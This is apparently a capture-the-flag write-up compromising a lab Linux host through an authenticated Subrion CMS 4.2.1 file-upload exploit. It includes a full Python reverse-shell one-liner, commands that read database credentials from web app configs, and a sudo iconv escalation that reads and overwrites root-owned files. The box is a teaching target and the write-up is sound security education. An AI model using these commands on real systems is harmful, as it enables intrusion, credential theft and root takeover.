CTF: Tech_Supp0rt1
Information
- Target IP: 10.10.199.224
- My IP: 10.8.98.126
First enumeration
Basics
- NMAP
```console
$ nmap -p- -A 10.10.199.224
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 22:39 CEST
Nmap scan report for 10.10.199.224
Host is up (0.037s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-05-11T20:46:05
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-05-12T02:16:03+05:30
|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: 0s
```
Vulnerability search
The nmap scripts already used a guest session against Samba (account_used: guest), so the shares are the first thing to enumerate:
```console
$ smbmap -H 10.10.199.224
[+] Guest session       IP: 10.10.199.224:445   Name: 10.10.199.224
        Disk                                    Permissions     Comment
        ----                                    -----------     -------
        print$                                  NO ACCESS       Printer Drivers
        websvr                                  READ ONLY
        IPC$                                    NO ACCESS       IPC Service (TechSupport server (Samba, Ubuntu))
```
Let's browse the websvr share: smb://10.10.199.224/websvr/
There is one file: enter.txt
```console
$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]

Wordpress creds
|->
```
So there is a Subrion CMS install under /subrion whose config is broken, an admin credential that has been "cooked" (encoded rather than hashed, since the note expects it to be recoverable), and an empty WordPress entry.
I pasted the string into CyberChef and its Magic operation identified the encoding and revealed the password.
Now we need to find the admin panel. gobuster helps with that:
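The "magical formula" step above relies on CyberChef's Magic operation, which tries stacks of common decoders until the output looks like text. The script below is an added example, not code from the original writeup: it does the same thing in a few lines of Python, peeling Base64, Base32, Base58 and hex layers recursively and stopping at the deepest layer that is still printable ASCII. The sample input is constructed inside the script from a made-up password, so nothing from the box is revealed here; passing the string from enter.txt to `magic()` reproduces the step.

```python
"""Layered decoder in the spirit of CyberChef's "Magic" operation.

Added example, not part of the original writeup. It tries a few common
encodings (Base64, Base32, Base58, hex) recursively and keeps peeling
while the result is printable ASCII. SAMPLE is constructed here from a
made-up password so the expected answer is known in advance.
"""
import base64
import binascii
import string

# Bitcoin-style Base58 alphabet (no 0, O, I, l), the variant CyberChef uses by default.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(s: str) -> bytes:
    """Decode Base58; each leading '1' becomes a leading zero byte."""
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-Base58 char
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def b58encode(data: bytes) -> str:
    """Encode bytes as Base58 (used only to build the constructed sample)."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58_ALPHABET[r] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


# Candidate decoders, tried in this order at every layer.
DECODERS = {
    "base64": lambda s: base64.b64decode(s, validate=True),
    "base32": lambda s: base64.b32decode(s, casefold=True),
    "base58": b58decode,
    "hex": bytes.fromhex,
}

PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}


def is_plaintext(data: bytes) -> bool:
    """Stop condition: non-empty and entirely printable ASCII."""
    return bool(data) and all(b in PRINTABLE for b in data)


def magic(blob: str, max_depth: int = 4, chain=()):
    """Return (plaintext, chain_of_decoders) for the deepest layered decode
    that still yields printable text, or None if no decoder applies."""
    if max_depth == 0:
        return None
    for name, fn in DECODERS.items():
        try:
            out = fn(blob)
        except (ValueError, binascii.Error):
            continue  # not valid in this encoding, try the next one
        if not is_plaintext(out):
            continue  # decoded to binary junk: wrong guess
        text = out.decode("ascii")
        # Printable output may itself be another encoding layer; prefer the
        # deepest decode, fall back to this layer if nothing goes further.
        deeper = magic(text, max_depth - 1, chain + (name,))
        return deeper or (text, chain + (name,))
    return None


# Constructed sample (hypothetical password, not the one from the box):
# encoded as Base64 first, then Base58, so the decode chain is base58 -> base64.
SECRET = b"Sup3r-S3cret!"
SAMPLE = b58encode(base64.b64encode(SECRET))

if __name__ == "__main__":
    print(SAMPLE)
    print(magic(SAMPLE))
```

The recursion is what makes this useful against "cooked" credentials: a single decoder would only strip the outer layer and hand back another blob. The heuristic is deliberately crude (printable ASCII), which is also why a real password that happens to be valid Base64 could be over-decoded; CyberChef's Magic mitigates that with language and entropy scoring, so treat the output as a candidate to verify, not a certainty.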
```console
$ gobuster dir -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://10.10.199.224/subrion/ -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar -b 404,302
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.199.224/subrion/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   302,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              tgz,tar.gz,pl,pub,jar,json,php,php.bak,bak,sql,sql.bak,tar,id_rsa,sh,rb,html,txt,js,zip,rar,log,py,cgi,bkp,xml,csv
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2022/05/11 23:18:04 Starting gobuster in directory enumeration mode
===============================================================
/sitemap.xml          (Status: 200) [Size: 628]
/updates/             (Status: 403) [Size: 278]
/license.txt          (Status: 200) [Size: 35147]
/install/             (Status: 200) [Size: 13095]
/changelog.txt        (Status: 200) [Size: 49250]
/robots.txt           (Status: 200) [Size: 142]
```
robots.txt is always worth reading: it lists exactly the paths the site owner wanted crawlers to stay out of.
```console
$ curl http://10.10.199.224/subrion/robots.txt
User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/
```
Here we go, the admin panel:
http://10.10.199.224/subrion/panel/
The Subrion version is 4.2.1.
```console
$ searchsploit subrion 4.2.1
-------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                   | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                    | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                 | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)          | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                  | php/webapps/45150.txt
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
The Arbitrary File Upload exploit is the one we need: it is authenticated (it takes a login and password), and we already hold the admin credentials.
Exploit
```console
$ searchsploit -m php/webapps/49876.py
$ python3 49876.py -l admin -p ***** -u http://10.10.199.224/subrion/panel/
```
The script drops us into a prompt where we can run system commands on the target.
From there, with a listener waiting on 10.8.98.126:1234, a Python reverse shell:
```console
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.98.126",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
And we get a shell back on the listener.
Privilege escalation
Enumeration for privesc
Both web apps keep database credentials in world-readable config files:
```console
$ cat /var/www/html/wordpress/wp-config.php
[...]
/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', '*****' );
[...]
```
```console
$ cat /var/www/html/subrion/includes/config.inc.php
[...]
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', '*****');
[...]
```
That gives two database passwords. Passwords found in application configs are frequently reused for local accounts, so let's try both against the scamsite user: the WordPress one works.
Since SSH is open (port 22), the same credentials also give a stable shell over SSH rather than the reverse shell.
```console
$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
```
Exploit
iconv converts a file from one character set to another and prints the result on stdout, so run as root with the same source and target encodings it is simply a root-level file reader:
```console
$ sudo iconv -f 8859_1 -t 8859_1 /root/root.txt
```
Reading the flag is enough for the room, but note that the rule is worse than a read primitive: iconv also accepts -o to write its output to a file, so the same sudo entry lets the user overwrite root-owned files (GTFOBins documents both uses).